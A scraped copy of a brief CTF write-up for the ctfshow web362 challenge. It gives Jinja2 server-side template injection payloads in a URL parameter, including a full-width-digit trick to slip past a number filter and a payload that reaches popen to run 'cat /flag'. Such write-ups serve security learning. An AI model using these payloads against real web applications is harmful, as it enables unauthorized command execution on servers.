当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
?name={
{"".__class__.__bases__[0].__subclasses__()}} It's normal up to this point 
from 12 It didn't work at first 
There's a problem with the numbers , see wp Use full angle numbers instead of normal numbers to bypass
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
Then you should be able to do it in the normal way
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_ sixty-two million ninety-four thousand eight hundred and fo]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231829007951.html
边栏推荐
- QT add external font ttf
- Setting up keil environment of GD single chip microcomputer
- 硬核解析Promise对象(这七个必会的常用API和七个关键问题你都了解吗?)
- 【ACM】376. 摆动序列
- STM32学习记录0008——GPIO那些事1
- Custom prompt box MessageBox in QT
- ESP32 LVGL8. 1 - anim animation (anim 16)
- QT tablewidget insert qcombobox drop-down box
- Interpretation and compilation of JVM
- PowerDesigner various font settings; Preview font setting; SQL font settings
猜你喜欢
WiFi ap6212 driver transplantation and debugging analysis technical notes
Cygwin64 right click to add menu, and open cygwin64 here
Matlab tips (6) comparison of seven filtering methods
In win10 system, all programs run as administrator by default
机器学习理论之(7):核函数 Kernels —— 一种帮助 SVM 实现非线性化决策边界的方式
Hard core parsing promise object (do you know these seven common APIs and seven key questions?)
使用 bitnami/postgresql-repmgr 镜像快速设置 PostgreSQL HA
Qt读写XML文件(含源码+注释)
Halo open source project learning (VII): caching mechanism
SSD硬盘SATA接口和M.2接口区别(详细)总结
随机推荐
In shell programming, the shell file with relative path is referenced
Keil RVMDK compiled data type
Ionic instruction set order from creation to packaging
Software test summary
Rust: the output information of println is displayed during the unit test
STM32学习记录0008——GPIO那些事1
回路-通路
ctfshow-web361(SSTI)
Mysql database backup command -- mysqldump
CISSP certified daily knowledge points (April 11, 2022)
Rewrite four functions such as StrCmp in C language
ctfshow-web362(SSTI)
NVIDIA Jetson: GStreamer and openmax (GST OMX) plug-ins
ESP32 LVGL8. 1 - label (style 14)
Mysqldump backup database
Can filter
Use stm32cube MX / stm32cube ide to generate FatFs code and operate SPI flash
Differences between SSD hard disk SATA interface and m.2 interface (detailed summary)
Quantexa CDI(场景决策智能)Syneo平台介绍
CISSP certified daily knowledge points (April 18, 2022)